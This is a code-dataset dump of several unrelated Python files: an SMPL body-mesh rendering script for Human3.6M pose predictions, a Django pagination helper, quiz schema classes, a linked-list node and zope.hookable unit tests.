float32)\n center = mpi_inf_valid['center'][i]\n scale = mpi_inf_valid['scale'][i]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i]\n betas = mpi_inf_pred['betas'][i]\n camera = mpi_inf_pred['camera'][i]\n camera_t = np.array([camera[1], camera[2], 2 * focal_length / (IMG_RES *\n camera[0] + 1e-09)])\n w, h = IMG_RES, IMG_RES\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n pose_spin = mpi_inf_spin['pose'][i]\n betas_spin = mpi_inf_spin['betas'][i]\n camera = mpi_inf_spin['camera'][i]\n camera_t_spin = np.array([camera[1], camera[2], 2 * focal_length / (\n IMG_RES * camera[0] + 1e-09)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0\n ].reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=\n np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=\n 20 + dist) * 255.0).astype('uint8')\n ort = np.reshape(pose_spin[:3], (3, 1))\n ort_mat = cv2.Rodrigues(ort)[0]\n trans_mat = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, 1]])\n new_ort = ort_mat.dot(trans_mat)\n pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].\n reshape(3), c=np.array([112, 112]), f=np.array([5000, 5000]), k=np.\n zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20 +\n dist) * 255.0).astype('uint8')\n fig = plt.figure()\n plt.imshow(rgb_img)\n height, width, channels = rgb_img.shape\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n 
plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_original_%06d.png' % i, dpi=300\n )\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_our_%06d.png' % i, dpi=300)\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im_spin)\n fig.set_size_inches(width / 100.0 / 3.0, height / 100.0 / 3.0)\n plt.gca().xaxis.set_major_locator(plt.NullLocator())\n plt.gca().yaxis.set_major_locator(plt.NullLocator())\n plt.subplots_adjust(top=1, bottom=0, left=0, right=1, hspace=0, wspace=0)\n plt.margins(0, 0)\n plt.axis('off')\n plt.savefig('../SPIN_MV/save_h36m/h36m_test_spin_%06d.png' % i, dpi=300)\n<mask token>\n",
"step-5": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 19 17:27:57 2020\n\n@author: li\n\"\"\"\n\nimport numpy as np\nfrom opendr.renderer import ColoredRenderer \nfrom opendr.lighting import LambertianPointLight\nfrom opendr.camera import ProjectPoints\nimport cPickle as pkl\nfrom models.smpl import Smpl, copy_smpl, joints_coco\nimport h5py\nfrom util import im\nfrom render_model import render_model\nfrom util.imutils import crop\nimport cv2\nimport matplotlib.pyplot as plt\nfrom os.path import join\nimport scipy.io as sio\n\nindex = 800\n\n#test_path = '../SPIN_MV/data/h36m_train_S1s_3d.npz'\ntest_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'\n#spin = '../SPIN_MV/S1_single_smplify.npz'\nspin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'\n#our = '../SPIN_MV/S1_multi_smplify.npz'\nour = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'\n\nmpi_inf_valid = np.load(test_path)\nROOT = '../SPIN_MV/data/'\nmpi_inf_spin = np.load(spin)\nmpi_inf_pred = np.load(our)\nIMG_RES = 224\nfocal_length = 5000\nmodel_file = 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl'\nwith open(model_file, 'rb') as fp:\n model_data = pkl.load(fp)\nfig = plt.figure()\n#plt.ion()\n#gt_keypoints = np.zeros((400,24,4))\nfor i in range(70563,70564):\n imgname = mpi_inf_valid['imgname'][i]\n #print(join(ROOT,imgname))\n rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)\n center = mpi_inf_valid['center'][i]\n scale = mpi_inf_valid['scale'][i]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i]\n betas = mpi_inf_pred['betas'][i]\n camera = mpi_inf_pred['camera'][i]\n #gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]\n camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])\n w, h = (IMG_RES, IMG_RES)\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n pose_spin = mpi_inf_spin['pose'][i]\n betas_spin = mpi_inf_spin['betas'][i]\n camera = mpi_inf_spin['camera'][i]\n camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n ort = np.reshape(pose_spin[:3],(3,1))\n #print(ort)\n ort_mat = cv2.Rodrigues(ort)[0]\n #print(ort_mat)\n trans_mat = np.array([[-1,0,0],\n [0,-1,0],\n [0,0,1]])\n new_ort = ort_mat.dot(trans_mat)\n pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n 
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n fig = plt.figure()\n #plt.subplot(1,3,1)\n plt.imshow(rgb_img)\n \n height, width, channels = rgb_img.shape \n # 如果dpi=300,那么图像大小=height*width \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.axis('off')\n plt.savefig(\"../SPIN_MV/save_h36m/h36m_test_original_%06d.png\" % (i), dpi=300)\n \n fig = plt.figure()\n #plt.subplot(1,3,2)\n plt.imshow(rgb_img)\n plt.imshow(im)\n \n # 如果dpi=300,那么图像大小=height*width \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.axis('off')\n plt.savefig(\"../SPIN_MV/save_h36m/h36m_test_our_%06d.png\" % (i), dpi=300)\n \n #fig = plt.figure()\n #plt.subplot()\n #plt.imshow(im_1)\n # 如果dpi=300,那么图像大小=height*width \n # fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n # plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n # plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n #plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n #plt.margins(0,0)\n #plt.axis('off')\n #plt.savefig(\"../SPIN_MV/save_mpi_smpl/mpi_test_our_view_%04d.png\" % (i), dpi=300)\n \n fig = plt.figure()\n #plt.subplot(1,3,3)\n plt.imshow(rgb_img)\n plt.imshow(im_spin)\n \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.axis('off')\n plt.savefig(\"../SPIN_MV/save_h36m/h36m_test_spin_%06d.png\" % (i), dpi=300)\n \n #plt.savefig('../SPIN_MV/save_h36m/h36m_test_%06d.png' % i)\n #plt.pause(1e-3)\n \n\n\n\"\"\"\niter_num = 25\nbatch_size = 4\nfor i in range(24,25): # iteration number\n for j in range(2,3): #batch_size\n for k in range(1,2):\n imgname = mpi_inf_valid['imgname'][i*batch_size+j][k]\n #print(join(ROOT,imgname))\n rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)\n center = mpi_inf_valid['center'][i*batch_size+j][k]\n scale = mpi_inf_valid['scale'][i*batch_size+j][k]\n rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])\n pose = mpi_inf_pred['pose'][i*batch_size*4+k*4+j]\n betas = mpi_inf_pred['betas'][i*batch_size*4+k*4+j]\n camera_t = mpi_inf_pred['camera'][i*batch_size*4+k*4+j]\n #gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]\n #camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])\n w, h = (IMG_RES, IMG_RES)\n rn = ColoredRenderer()\n pred_base_smpl = Smpl(model_data)\n pred_base_smpl.pose[:] = pose\n pred_base_smpl.betas[:] = betas\n pred_rot = np.eye(3)\n rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n 
pose_spin = mpi_inf_spin['pose'][i*batch_size*4+k*4+j]\n betas_spin = mpi_inf_spin['betas'][i*batch_size*4+k*4+j]\n camera_t_spin = mpi_inf_spin['camera'][i*batch_size*4+k*4+j]\n #camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])\n rn = ColoredRenderer()\n pred_base_smpl.pose[:] = pose_spin\n pred_base_smpl.betas[:] = betas_spin\n rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),\n f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)\n dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])\n verts = pred_base_smpl.r\n im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')\n \n # orignal image\n fig = plt.figure()\n #plt.imshow(im+)\n #plt.subplot(1,3,1)\n plt.imshow(rgb_img)\n plt.axis('off')\n #plt.subplot(1,3,2)\n height, width, channels = rgb_img.shape \n # 如果dpi=300,那么图像大小=height*width \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.savefig(\"../SPIN_MV/save_smpl/S1_%d_view_%d_orig.png\" % (i*batch_size+j, k), dpi=300)\n \n # multi\n fig = plt.figure()\n plt.imshow(rgb_img)\n plt.imshow(im)\n plt.axis('off')\n height, width, channels = rgb_img.shape \n # 如果dpi=300,那么图像大小=height*width \n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.savefig(\"../SPIN_MV/save_smpl/S1_%d_view_%d_multi.png\" % (i*batch_size+j, k), dpi=300)\n #plt.imshow(img[sample_idx].transpose((1,2,0)))\n #plt.subplot(1,2,1)\n \n # single\n fig = plt.figure()\n #plt.subplot(1,3,3)\n plt.imshow(rgb_img)\n #plt.imshow(img[sample_idx].transpose((1,2,0)))\n #plt.subplot(1,2,1)\n plt.imshow(im_spin)\n plt.axis('off')\n #plt.ioff()\n fig.set_size_inches(width/100.0/3.0, height/100.0/3.0) \n plt.gca().xaxis.set_major_locator(plt.NullLocator()) \n plt.gca().yaxis.set_major_locator(plt.NullLocator()) \n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n plt.margins(0,0)\n plt.savefig(\"../SPIN_MV/save_smpl/S1_%d_view_%d_single.png\" % (i*batch_size+j, k), dpi=300)\n #plt.pause(1e-3)\n #plt.show()\n\"\"\"\n\"\"\"\nH36M_TO_J17 = [6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10, 0, 7, 9]\nH36M_TO_J14 = H36M_TO_J17[:14]\nJ24_TO_J17 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 18, 14, 16, 17]\nJ24_TO_J14 = J24_TO_J17[:14]\njoint_mapper_gt = J24_TO_J14\njoint_mapper_h36m = H36M_TO_J14\ngt_keypoints = gt_keypoints[:, joint_mapper_gt, :-1]\nsio.savemat('../SPIN_MV/evaluation/S1_gt.mat',{'gt_joints17':gt_keypoints})\nsio.savemat('../SPIN_MV/evaluation/S1_single_gt.mat',{'pred_joints':mpi_inf_spin['pred_joints']})\nsio.savemat('../SPIN_MV/evaluation/S1_multi_gt.mat',{'pred_joints':mpi_inf_pred['pred_joints']})\n\"\"\"",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
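The record above repeatedly converts SPIN's weak-perspective camera prediction (s, tx, ty) into a translation for a fixed-focal-length perspective camera before rendering. A minimal sketch of that same conversion factored into a helper — the function name and defaults are illustrative, but the formula is taken verbatim from the code above:

import numpy as np

def weak_perspective_to_translation(cam, focal_length=5000.0, img_res=224):
    # cam = (s, tx, ty): scale and image-plane offsets predicted by the network.
    # Depth follows from matching the weak-perspective scale s to f / z over an
    # image of img_res pixels; the epsilon guards against s close to zero.
    s, tx, ty = cam
    tz = 2.0 * focal_length / (img_res * s + 1e-9)
    return np.array([tx, ty, tz])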
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def pagination(request, queryset, display_amount=15, after_range_num=5,
bevor_range_num=4):
paginator = Paginator(queryset, display_amount)
try:
page = int(request.GET['page'])
except:
page = 1
try:
objects = paginator.page(page)
    except EmptyPage:
objects = paginator.page(paginator.num_pages)
except:
objects = paginator.page(1)
if page >= after_range_num:
page_range = paginator.page_range[page - after_range_num:page +
bevor_range_num]
else:
page_range = paginator.page_range[0:page + bevor_range_num]
return objects, page_range
<|reserved_special_token_1|>
from django.core.paginator import Paginator, EmptyPage
def pagination(request, queryset, display_amount=15, after_range_num=5,
bevor_range_num=4):
paginator = Paginator(queryset, display_amount)
try:
page = int(request.GET['page'])
except:
page = 1
try:
objects = paginator.page(page)
    except EmptyPage:
objects = paginator.page(paginator.num_pages)
except:
objects = paginator.page(1)
if page >= after_range_num:
page_range = paginator.page_range[page - after_range_num:page +
bevor_range_num]
else:
page_range = paginator.page_range[0:page + bevor_range_num]
return objects, page_range
<|reserved_special_token_1|>
# -*- coding:utf-8 -*-
#
from django.core.paginator import Paginator, EmptyPage
def pagination(request, queryset, display_amount=15, after_range_num=5, bevor_range_num=4):
    # Paginate the queryset according to the parameters
    paginator = Paginator(queryset, display_amount)
    try:
        # Get the page parameter from the request
        page = int(request.GET['page'])
    except:
        # Default to the first page
        page = 1
    try:
        # Try to fetch the requested page
        objects = paginator.page(page)
    # If the page number is out of range
    except EmptyPage:
        # Return the last page
        objects = paginator.page(paginator.num_pages)
    # If the value is not a valid page
    except:
        # Return the first page
        objects = paginator.page(1)
    # Configure the range of page links shown in the navigation
    if page >= after_range_num:
        page_range = paginator.page_range[page-after_range_num:page+bevor_range_num]
    else:
        page_range = paginator.page_range[0:page+bevor_range_num]
    return objects, page_range
|
flexible
|
{
"blob_id": "7a2b33d1763e66335c6a72a35082e20725cab03d",
"index": 3318,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef pagination(request, queryset, display_amount=15, after_range_num=5,\n bevor_range_num=4):\n paginator = Paginator(queryset, display_amount)\n try:\n page = int(request.GET['page'])\n except:\n page = 1\n try:\n objects = paginator.page(page)\n except paginator.EmptyPage:\n objects = paginator.page(paginator.num_pages)\n except:\n objects = paginator.page(1)\n if page >= after_range_num:\n page_range = paginator.page_range[page - after_range_num:page +\n bevor_range_num]\n else:\n page_range = paginator.page_range[0:page + bevor_range_num]\n return objects, page_range\n",
"step-3": "from django.core.paginator import Paginator\n\n\ndef pagination(request, queryset, display_amount=15, after_range_num=5,\n bevor_range_num=4):\n paginator = Paginator(queryset, display_amount)\n try:\n page = int(request.GET['page'])\n except:\n page = 1\n try:\n objects = paginator.page(page)\n except paginator.EmptyPage:\n objects = paginator.page(paginator.num_pages)\n except:\n objects = paginator.page(1)\n if page >= after_range_num:\n page_range = paginator.page_range[page - after_range_num:page +\n bevor_range_num]\n else:\n page_range = paginator.page_range[0:page + bevor_range_num]\n return objects, page_range\n",
"step-4": "# -*- coding:utf-8 -*-\n#\nfrom django.core.paginator import Paginator\n\ndef pagination(request, queryset, display_amount=15, after_range_num=5, bevor_range_num=4):\n # 按参数分页\n paginator = Paginator(queryset, display_amount)\n try:\n # 得到request中的page参数\n page = int(request.GET['page'])\n except:\n # 默认为1\n page = 1\n try:\n # 尝试获得分页列表\n objects = paginator.page(page)\n # 如果页数不存在\n except paginator.EmptyPage:\n # 获得最后一页\n objects = paginator.page(paginator.num_pages)\n # 如果不是一个整数\n except:\n # 获得第一页\n objects = paginator.page(1)\n # 根据参数配置导航显示范围\n if page >= after_range_num:\n page_range = paginator.page_range[page-after_range_num:page+bevor_range_num]\n else:\n page_range = paginator.page_range[0:page+bevor_range_num]\n return objects, page_range\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
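A usage sketch for the pagination() helper above, wired into a Django view; the Article model, module paths, and template name are assumptions for illustration only:

from django.shortcuts import render
from .models import Article          # hypothetical model
from .utils import pagination        # wherever the helper lives

def article_list(request):
    objects, page_range = pagination(request, Article.objects.all(),
                                     display_amount=10)
    return render(request, 'articles/list.html',
                  {'articles': objects, 'page_range': page_range})

The template can then iterate over page_range to draw the page links and over objects for the rows themselves.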
from quiz.schema.base import Schema
from quiz.schema.schemas import UserSchemas
class RegisterSchema(Schema):
    """
    Registration
    """
    _schema = UserSchemas.REG_SCHEMA.value
class LoginSchema(Schema):
    """
    Login
    """
    _schema = UserSchemas.LOGIN_SCHEMA.value
|
normal
|
{
"blob_id": "e0d7fb8a9799c91dca0ca0827a5149804c9efabb",
"index": 7082,
"step-1": "<mask token>\n\n\nclass RegisterSchema(Schema):\n <mask token>\n <mask token>\n\n\nclass LoginSchema(Schema):\n \"\"\"\n 登录\n \"\"\"\n _schema = UserSchemas.LOGIN_SCHEMA.value\n",
"step-2": "<mask token>\n\n\nclass RegisterSchema(Schema):\n <mask token>\n _schema = UserSchemas.REG_SCHEMA.value\n\n\nclass LoginSchema(Schema):\n \"\"\"\n 登录\n \"\"\"\n _schema = UserSchemas.LOGIN_SCHEMA.value\n",
"step-3": "<mask token>\n\n\nclass RegisterSchema(Schema):\n \"\"\"\n 注册\n \"\"\"\n _schema = UserSchemas.REG_SCHEMA.value\n\n\nclass LoginSchema(Schema):\n \"\"\"\n 登录\n \"\"\"\n _schema = UserSchemas.LOGIN_SCHEMA.value\n",
"step-4": "from quiz.schema.base import Schema\nfrom quiz.schema.schemas import UserSchemas\n\n\nclass RegisterSchema(Schema):\n \"\"\"\n 注册\n \"\"\"\n _schema = UserSchemas.REG_SCHEMA.value\n\n\nclass LoginSchema(Schema):\n \"\"\"\n 登录\n \"\"\"\n _schema = UserSchemas.LOGIN_SCHEMA.value\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
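The Schema base class imported above is not shown in this record. Purely as an assumption about its shape, here is a minimal jsonschema-backed base that would make the two subclasses work — every name beyond what the record imports is hypothetical:

import jsonschema

class Schema:
    _schema = None  # subclasses assign a jsonschema document

    @classmethod
    def validate(cls, payload):
        # Raises jsonschema.ValidationError on bad input.
        jsonschema.validate(instance=payload, schema=cls._schema)
        return payload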
from cancion import *
class NodoLista:
    def __init__(self, cancion, s, a):
        # Doubly linked list node: stores a song plus references to the
        # next (siguiente) and previous (anterior) nodes.
        self.elemento = cancion
self.siguiente = s
self.anterior = a
|
normal
|
{
"blob_id": "1fb3904d48905ade8f83b6e052057e80302ec5a7",
"index": 4253,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass NodoLista:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass NodoLista:\n\n def __init__(self, cancion, s, a):\n self.elemento = cancion\n self.siguiente = s\n self.anterior = a\n",
"step-4": "from cancion import *\n\n\nclass NodoLista:\n\n def __init__(self, cancion, s, a):\n self.elemento = cancion\n self.siguiente = s\n self.anterior = a\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
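Illustrative only: a tiny doubly linked playlist built on NodoLista, showing how the siguiente/anterior links are meant to be maintained. The Cancion interface is not visible in this record, so the song argument is treated as opaque:

class ListaReproduccion:
    def __init__(self):
        self.primero = None  # head of the list
        self.ultimo = None   # tail of the list

    def agregar(self, cancion):
        # New tail node: no successor, previous pointer is the old tail.
        nodo = NodoLista(cancion, None, self.ultimo)
        if self.ultimo is None:
            self.primero = nodo
        else:
            self.ultimo.siguiente = nodo
        self.ultimo = nodo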
##############################################################################
#
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test the hookable support Extension
"""
import unittest
def return_foo():
return 'FOO'
def return_bar():
return 'BAR'
def not_called():
raise AssertionError("This should not be called")
class PyHookableMixin:
def _callFUT(self, *args, **kw):
from zope.hookable import _py_hookable
return _py_hookable(*args, **kw)
class HookableMixin:
def _callFUT(self, *args, **kw):
from zope.hookable import _py_hookable
from zope.hookable import hookable
if hookable is _py_hookable:
raise unittest.SkipTest("Hookable and PyHookable are the same")
return hookable(*args, **kw) # pragma: no cover
class PyHookableTests(PyHookableMixin,
unittest.TestCase):
def test_pure_python(self):
from zope.hookable import _PURE_PYTHON
from zope.hookable import _c_hookable
from zope.hookable import _py_hookable
from zope.hookable import hookable
self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)
def test_before_hook(self):
hooked = self._callFUT(return_foo)
self.assertIs(hooked.original, return_foo)
self.assertIs(hooked.implementation, return_foo)
self.assertEqual(hooked(), 'FOO')
def test_after_hook(self):
hooked = self._callFUT(not_called)
old = hooked.sethook(return_bar)
self.assertIs(old, not_called)
self.assertIs(hooked.original, not_called)
self.assertIs(hooked.implementation, return_bar)
self.assertEqual(hooked(), 'BAR')
def test_after_hook_and_reset(self):
hooked = self._callFUT(return_foo)
old = hooked.sethook(not_called)
hooked.reset()
self.assertIs(old, return_foo)
self.assertIs(hooked.original, return_foo)
self.assertIs(hooked.implementation, return_foo)
self.assertEqual(hooked(), 'FOO')
def test_original_cannot_be_deleted(self):
hooked = self._callFUT(not_called)
with self.assertRaises((TypeError, AttributeError)):
del hooked.original
def test_implementation_cannot_be_deleted(self):
hooked = self._callFUT(not_called)
with self.assertRaises((TypeError, AttributeError)):
del hooked.implementation
def test_no_args(self):
with self.assertRaises(TypeError):
self._callFUT()
def test_too_many_args(self):
with self.assertRaises(TypeError):
self._callFUT(not_called, not_called)
def test_w_implementation_kwarg(self):
hooked = self._callFUT(implementation=return_foo)
self.assertIs(hooked.original, return_foo)
self.assertIs(hooked.implementation, return_foo)
self.assertEqual(hooked(), 'FOO')
def test_w_unknown_kwarg(self):
with self.assertRaises(TypeError):
self._callFUT(nonesuch=42)
def test_class(self):
class C:
pass
hooked = self._callFUT(C)
self.assertIsInstance(hooked(), C)
hooked.sethook(return_bar)
self.assertEqual(hooked(), 'BAR')
class TestIssue6Py(PyHookableMixin,
unittest.TestCase):
# Make sphinx docs for hooked objects work.
# https://github.com/zopefoundation/zope.hookable/issues/6
# We need to proxy __doc__ to the original,
# and synthesize an empty __bases__ and a __dict__ attribute
# if they're not present.
def _check_preserves_doc(self, docs):
self.assertEqual("I have some docs", docs.__doc__)
hooked = self._callFUT(docs)
self.assertEqual(hooked.__doc__, docs.__doc__)
def test_preserves_doc_function(self):
def docs():
"""I have some docs"""
self._check_preserves_doc(docs)
def test_preserves_doc_class(self):
class Docs:
"""I have some docs"""
self._check_preserves_doc(Docs)
def test_empty_bases_function(self):
hooked = self._callFUT(return_foo)
self.assertEqual((), hooked.__bases__)
def test_empty_dict_function(self):
hooked = self._callFUT(return_foo)
self.assertEqual({}, hooked.__dict__)
def test_bases_class(self):
class C:
pass
self.assertEqual(C.__bases__, (object,))
hooked = self._callFUT(C)
self.assertEqual(hooked.__bases__, (object,))
def test_dict_class(self):
class C:
pass
hooked = self._callFUT(C)
self.assertEqual(hooked.__dict__, C.__dict__)
def test_non_string_attr_name(self):
# Specifically for the C implementation, which has to deal with this
hooked = self._callFUT(return_foo)
with self.assertRaises(TypeError):
getattr(hooked, 42)
with self.assertRaises(TypeError):
hooked.__getattribute__(42)
def test_unicode_attribute_name(self):
# Specifically for the C implementation, which has to deal with this
hooked = self._callFUT(return_foo)
result = hooked.__getattribute__('__bases__')
self.assertEqual(result, ())
def test_short_name(self):
# Specifically for the C implementation, which has to deal with this
hooked = self._callFUT(return_foo)
with self.assertRaises(AttributeError):
hooked.__getattribute__('')
class HookableTests(HookableMixin, PyHookableTests):
pass
class TestIssue6(HookableMixin, TestIssue6Py):
pass
def test_suite():
return unittest.defaultTestLoader.loadTestsFromName(__name__)
|
normal
|
{
"blob_id": "13c0af340c4fff815919d7cbb1cfd3116be13771",
"index": 7907,
